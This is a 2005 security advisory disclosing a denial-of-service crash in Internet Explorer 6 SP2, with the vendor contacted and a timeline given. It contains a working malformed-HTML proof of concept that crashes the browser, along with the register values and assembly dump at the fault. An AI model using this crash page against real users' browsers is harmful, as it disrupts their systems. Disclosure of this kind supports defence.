[BuHa-Security] DoS Vulnerability in M$ IE 6 SP2 #2
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
---------------------------------------------------
| BuHa Security-Advisory #5 | Dec 24th, 2005 |
---------------------------------------------------
| Vendor | M$ Internet Explorer 6.0 |
| URL | http://www.microsoft.com/windows/ie/ |
| Version | <= 6.0.2900.2180.xpsp_sp2 |
| Risk | Low (DoS - Null Read Dereference) |
---------------------------------------------------
o Description:
=============
Internet Explorer, abbreviated IE or MSIE, is a proprietary web browser
made by Microsoft and currently available as part of Microsoft Windows.
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Denial of Service: <mshtml.dll>#7d6c74b1
===================
Following HTML code forces M$ IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN">
> </samp></colgroup><ul><font><menu> <code> <var>
> <sub><h2></fieldset>
> </kbd></frameset>
> </ins></map></noframes>
> </isindex>
> </code>
> </div></title>
> </del></var><isindex>
> <i>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1132900490843-7d6c74b1.html
These are the register values and the ASM dump at the time of the access
violation:
eax=0129040a ebx=0129ef30 ecx=00000001 edx=012945f0 esi=00000000
edi=0012b3a8 eip=7d6c74b1 esp=0012b280 ebp=0012b2a8
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
7d6c748b 6a0b push 0xb
7d6c748d 33c0 xor eax,eax
7d6c748f 59 pop ecx
7d6c7490 8bfe mov edi,esi
7d6c7492 f3ab rep stosd
7d6c7494 8b45f8 mov eax,[ebp-0x8]
7d6c7497 8906 mov [esi],eax
7d6c7499 897228 mov [edx+0x28],esi
7d6c749c e9af010000 jmp mshtml+0x217650 (7d6c7650)
7d6c74a1 8b4728 mov eax,[edi+0x28]
7d6c74a4 8b7028 mov esi,[eax+0x28]
7d6c74a7 897728 mov [edi+0x28],esi
7d6c74aa 8b4320 mov eax,[ebx+0x20]
7d6c74ad 668b4002 mov ax,[eax+0x2]
FAULT ->7d6c74b1 8b4e24 mov ecx,[esi+0x24]
ds:0023:00000024=????????
7d6c74b4 66250030 and ax,0x3000
7d6c74b8 662d0010 sub ax,0x1000
7d6c74bc 66f7d8 neg ax
7d6c74bf 897510 mov [ebp+0x10],esi
7d6c74c2 1bc0 sbb eax,eax
7d6c74c4 40 inc eax
7d6c74c5 50 push eax
7d6c74c6 e80c8efeff call mshtml+0x2002d7 (7d6b02d7)
7d6c74cb 0fb6c0 movzx eax,al
7d6c74ce 48 dec eax
7d6c74cf 83f80c cmp eax,0xc
7d6c74d2 0f877b010000 jnbe mshtml+0x217653 (7d6c7653)
7d6c74d8 ff2485c7796c7d jmp dword ptr [mshtml+0x2179c7
(7d6c79c7)+eax*4]
7d6c74df 8b4e20 mov ecx,[esi+0x20]
7d6c74e2 f6410208 test byte ptr [ecx+0x2],0x8
7d6c74e6 7419 jz mshtml+0x217501 (7d6c7501)
7d6c74e8 8b45fc mov eax,[ebp-0x4]
7d6c74eb ff7014 push dword ptr [eax+0x14]
7d6c74ee 8b4610 mov eax,[esi+0x10]
7d6c74f1 03460c add eax,[esi+0xc]
7d6c74f4 50 push eax
7d6c74f5 e899ba0100 call mshtml+0x232f93 (7d6e2f93)
It appears to be a null read dereference crash which is not exploitable.
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> M$ IE 6 SP2 - Win XP Pro SP2
> M$ IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
26 Nov 05 - DoS vulnerability discovered.
15 Dec 05 - Vendor contacted.
20 Dec 05 - Vendor confirmed vulnerability.
24 Dec 05 - Public release.
o Solution:
==========
There is no patch yet. The vulnerability will be fixed in an upcoming
service pack according to the Microsoft Security Response Center.
o Credits:
=========
Christian Deneke <bugtraq@xxxxxxxxxx>
- --
Thomas Waldegger <bugtraq@xxxxxxxxxxxx>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@xxxxxxxxxxxx' is more a
spam address than a regular mail address therefore it's possible that I
ignore some mails. Please use the contact details at morph3us.org
to contact me.
Greets fly out to cyrus-tc, destructor, rhy, trappy and all members of BuHa.
Advisory online: http://morph3us.org/advisories/20051224-msie6-sp2-2.txt
-----BEGIN PGP SIGNATURE-----
Version: n/a
Comment: http://morph3us.org/
iD8DBQFDrdsUkCo6/ctnOpYRAuyKAKCs+kRe0D9LEpRSaBV8skBLrIWzPACfS4mU
07WulbyPImV5j9zbwi56gOo=
=JX5G
-----END PGP SIGNATURE-----